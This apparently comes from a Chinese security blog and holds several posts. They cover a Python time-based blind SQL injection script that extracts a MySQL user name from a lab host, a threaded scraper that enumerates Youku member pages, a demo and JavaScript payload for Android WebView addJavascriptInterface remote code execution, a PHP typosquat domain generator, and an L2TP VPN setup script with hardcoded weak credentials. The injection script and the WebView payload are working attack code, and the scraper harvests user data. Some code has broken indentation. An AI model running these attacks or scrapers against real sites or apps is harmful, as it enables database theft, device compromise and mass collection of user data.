python blind_injection.py demo for mysql

1条回复

之前某人分享过判断二进制0/1来盲注,现在用python写了个demo

import urllib
import urllib2
import time
import threading
 
 
class blind_injection:
    def __init__(self,thread_num):
        	self.thread_count=self.thread_num=thread_num
        	self.lock=threading.Lock()
        		self.res={}
        		self.resdata={}
		        self.tmp=''
    def _request(self,URL):
        		user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
		        req = urllib2.Request(URL, None, user_agent)
        		try:
			            request=urllib2.urlopen(req,timeout=2)
        		    except Exception ,e:
			            #time.sleep(0.01)
			            return 'timeout'
		    return request.read()
 
    def bin2dec(self,string_num):
        	return int(string_num,2)
 
 
 
    def _getlength(self,ii):
        	thread_id=int(threading.currentThread().getName())
        	ii=ii+1
        	url="http://10.211.55.20/testmysql.php?test=1'%20and%20if(mid(lpad(bin(length(user())),8,0),"+str(ii)+",1)=1,sleep(2),0)%23"
        	html=self._request(url)
        	#print html
        	verify = 'timeout'
        	if verify not in html:
        	    self.res[str(ii)] = 0
		else:
        	    self.res[str(ii)] = 1
        	self.lock.acquire()
        	self.thread_count-=1
        	self.lock.release()
 
    def _getdata(self,j,x):
        	url="http://10.211.55.20/testmysql.php?test=1'%20and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
        	html=self._request(url)
        	#print url
        	#print html
        	verify = 'timeout'
        	if verify not in html:
        	    self.resdata[str(j)] = 0
		else:
        	    self.resdata[str(j)] = 1
        	self.lock.acquire()
        	self.thread_count-=1
        	self.lock.release()
 
 
    def _getstep(self):
        	self.data=''
        	for x in range(self.datalength):
        	    x=x+1
        	    self.thread_count=8
        	    self.tmp=''
        	    for j in range(self.thread_num):
        	        j=j+1
        	        t=threading.Thread(target=self._getdata,name=str(j),args=(j,x))
        	        t.setDaemon(True)
        	        t.start()
        	        while self.thread_count>0:
        	            time.sleep(0.01)
        	        for i in range(8):
        	            self.tmp=self.tmp+str(self.resdata[str(i+1)])
        	        self.data=self.data+chr(self.bin2dec(self.tmp))
        	    print self.data
 
 
 
 
    def run(self):
        for i in range(self.thread_num):
            t=threading.Thread(target=self._getlength,name=str(i),args=(i,))
            t.setDaemon(True)
            t.start()
            while self.thread_count>0:
                time.sleep(0.01)
            for i in range(8):
                self.tmp = self.tmp + str(self.res[str(i+1)]) 
            self.datalength=self.bin2dec(self.tmp)
            print 'length:'+ str(self.datalength)
            self._getstep()
 
 
if __name__=='__main__':
    d=blind_injection(thread_num=8)
    d.run()

python多线程学习笔记1

1条回复

之前用linux shell写过多线程统计youku网站会员的,现在用python再实现一遍,做为学习笔记备注。

import threading 
import urllib2
import urllib
import base64
import time
 
class GETyouku:
    def __init__(self,thread_num):
        self.thread_count=self.thread_num=thread_num
        self.lock=threading.Lock()
 
    def _getyoukucount(self,ii):
        thread_id=int(threading.currentThread().getName())
        self.str=2
        self.str+=ii
        while self.str > 1 and self.str<300:
            self.base64_str=base64.b64encode(str(self.str))
            url="http://i.youku.com/u/U"+self.base64_str
            req=urllib2.Request(url)
            print 'self.str:'+str(self.str)+urllib2.urlopen(req).read()
 
            self.str+=1
 
 
        self.lock.acquire()
        self.thread_count -= 1
        self.lock.release()
 
 
    def run(self):
        for i in range(self.thread_num):
        q=threading.Thread(target=self._getyoukucount,name=str(i),args=(i,))
        q.setDaemon(True)
        q.start()
 
        while self.thread_count>0:
            time.sleep(0.01)
 
if __name__ == '__main__':
    d=GETyouku(thread_num=20)
    d.run()

app安全测试之WebView rce学习笔记

1条回复

0x00 漏洞原理

由于Webview组件有一个方法(AddJavascripInterface),该方法可以对javascript与android应用交互,接着攻击者可以找到存在“getClass”方法的对象,然后通过反射的机制,得到Java Runtime对象,然后调用静态方法来执行系统命令。

0x01 漏洞demo演示

为了进一步搞清楚这个漏洞,我写了个包含有该漏洞的android应用程序,下面为核心代码

#记得给权限android.permission.INTERNET
 
private static final String url="http://www.leesec.info/mobilelab/webview_rce.html";
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);	
this.requestWindowFeature(Window.FEATURE_NO_TITLE);
setContentView(R.layout.activity_first);
WebView mWebView = (WebView) this.findViewById(R.id.wv_oauth);//实例化对象
mWebView.getSettings().setJavaScriptEnabled(true);//开启javascript支持
mWebView.addJavascriptInterface(this, "injectedObj");
mWebView.loadUrl(url);//加载网页
}

接着webview_rce.html的部分内容为

function execute(cmdArgs)
{
   return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); 
}        
execute(['/system/bin/sh','-c','echo  "this is a test" > /cache/check.txt']);

如果程序运行成功,但是cache目录下没有生成check.txt文件,我找到原因是cache目录权限太小,给777后,发现运行app后,文件成功写入到android系统内。

0x03 漏洞修复方法

检查WebView类中的addJavascriptInterface方法,是否存在searchBoxJavaBridge_接口
调用 removeJavascriptInterface(“searchBoxJavaBridge_”)移除默认接口

工具:php实现穷举域名功能

发表回复

1.需求如下:
假设某网站域名为http://www.wangzhan.com,要实现这个功能:
域名第一个字符遍历
http://www.aangzhan.com
……
zangzhan.com
域名第二个字符遍历
http://www.wangzhan.com
……
wzngzhan.com
以此类推到域名最后一个字符遍历
2.实现代码如下:

<?php 
 
$str=$argv[1];
$website_arr=explode(".",$str);
$website_name=$website_arr[1];
$website_length=strlen($website_name);
$key = array(
	array("/j/","l"),
	array("/l/","j"),
	array("/i/","j"),
	array("/j/","i"),
	array("/i/","1"),
	array("/1/","i"),
	array("/j/","1"),
	array("/1/","j"),
	array("/l/","i"),
	array("/i/","l"),
	array("/b/","lo"),
	array("/lo/","b"),
	array("/q/","9"),
	array("/9/","q"),
	array("/u/","v"),
	array("/v/","u"),
	array("/6/","b"),
	array("/b/","6"),
	array("/w/","vv"),
	array("/vv/","w"),
	array("/m/","nn"),
	array("/nn/","m"),
	array("/o/","0"),
	array("/0/","o"),
	array("/m/","n"),
	array("/n/","m"),
	array("/com/","com.cn"),
	array("/com/","cn"),
	array("/com/","net"),
	array("/com/","org"),
	array("/com/","tk"),
	array("/com/","pk"),
	array("/com/","cf"),
	array("/com/","cc"),
	array("/com/","tv"),
	array("/com/","pl"),
	array("/com/","im"),
	array("/cn/","com"),
	array("/cn/","com.cn"),
	array("/cn/","net"),
	array("/cn/","org"),
	array("/cn/","tk"),
	array("/cn/","pk"),
	array("/cn/","cf"),
	array("/cn/","cc"),
	array("/cn/","tv"),
	array("/cn/","pl"),
	array("/cn/","im"),
	array("/cn/","cn.com"),
	array("/cn/","cn.org"),
	array("/cn/","org.cn"),
	array("/cn/","net.cn"),
	array("/cn/","cn.net"),
	array("/www./","www-"),
	array("/www./","www"),
	array("/china/","chnina"),
	array("/abc/","abcd"),
	array("/bank/","bork"),
	array("/bank/","benk"),
	array("/bank/","bonk"),
	array("/bank/","bark"),
	array("/so/","sou"),
	array("/2/","z"),
	array("/z/","2"),
	array("/c/","2"),
	array("/c/","z"),
 
 
 
 
	);
for($j=0;$j<$website_length;$j++){
	if($j==0){
		dealstring('',substr($website_name,$j+1),$website_arr,$key);
	}else if($j==$website_length-1){
		dealstring(substr($website_name,0,$j),'',$website_arr,$key);
	}else{
		dealstring(substr($website_name,0,$j),substr($website_name,$j+1),$website_arr,$key);
	}
}
 
function dealstring($str_zuo,$str_you,$website_arr,$key){
 
//echo 'string:'.$str_zuo.' '.$str_you."\r\n";
 
for($i=97;$i<123;$i++){
 
	echo findHost($website_arr[0].'.'.$str_zuo.chr($i).$str_you.'.'.$website_arr[2],$key);
}
 
}
 
function findHost($host,$key){
	//echo $host."\r\n";
	for($i=0;$i<sizeof($key);$i++){ 		
           $hostChange =preg_replace($key[$i][0],$key[$i][1],$host); 	
           if($hostChange!=$host) 		
              echo $hostChange."\r\n"; 		
        }
} 
?>

下图为运行结果:

接着可以实现访问每个网站检查其是否可以访问,然后监控其内容是否为钓鱼网站。

一键安装L2TP VPN脚本

8条回复

1.安装L2TP VPN方法
第一种: openswan+xl2tpd 安装后,我发现这个只能用WINDOW连接,IOS系统连接不了VPN,所以被迫使用第二种方法。
第二种: strongswan+xl2tpd 安装后,IOS、WINDOW系统都可以连接成功。
2.strongswan+xl2tpd 一键安装脚本(Centos6.5亲测成功)

rpm -ivh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
yum -y  update
yum -y install strongswan
yum -y install xl2tpd
sed -i 's/net.ipv4.ip_forward = 0/net.ipv4.ip_forward = 1/g' /etc/sysctl.conf
sysctl -p
iptables -A INPUT -p udp --dport 500 -j ACCEPT # IKE
iptables -A INPUT -p udp --dport 4500 -j ACCEPT # NAT-T
iptables -A INPUT -p udp -m policy --dir in --pol ipsec -m udp --dport 1701 -j ACCEPT # 強制l2tp透過ipsec存取
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
ip_addr=` ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' |cut -d: -f2 | awk '{ print $1}'`
echo "conn %default
        ikelifetime=24h
        keylife=24h
        rekeymargin=30m 
        keyingtries=1
        rekey=no
 
 
conn l2tp
        keyexchange=ikev1 # IKE版本
        left=$ip_addr
        leftsubnet=0.0.0.0/0
        leftprotoport=17/1701 # l2tp udp流量
        authby=secret # PSK驗證
        leftfirewall=no # 不要讓strongswan更改防火牆
        right=%any # 任意IP
        rightprotoport=17/%any # 任意port udp流量
        type=transport # ipsec transport mode 
        auto=add">>/etc/strongswan/ipsec.conf
echo ': PSK "fuck_great_firewall"'>>/etc/strongswan/ipsec.secrets
sed 's/\[global\].*$/&\nlisten-addr ='$ip_addr'/g' /etc/xl2tpd/xl2tpd.conf
sed -i 's/^mtu.*/mtu 1200/g' /etc/ppp/options.xl2tpd
sed -i 's/^mru.*/mru 1200/g' /etc/ppp/options.xl2tpd
echo 'login'>>/etc/ppp/options.xl2tpd
echo 'test * test123 *'>>/etc/ppp/chap-secrets
service strongswan start
service xl2tpd start
chkconfig strongswan on
chkconfig xl2tpd on

3.安装完成后,具体信息如下:
连接方式:L2TP
VPN用户名:test
VPN密码:test123
密钥:fuck_great_firewall

4.本文仅供学习交流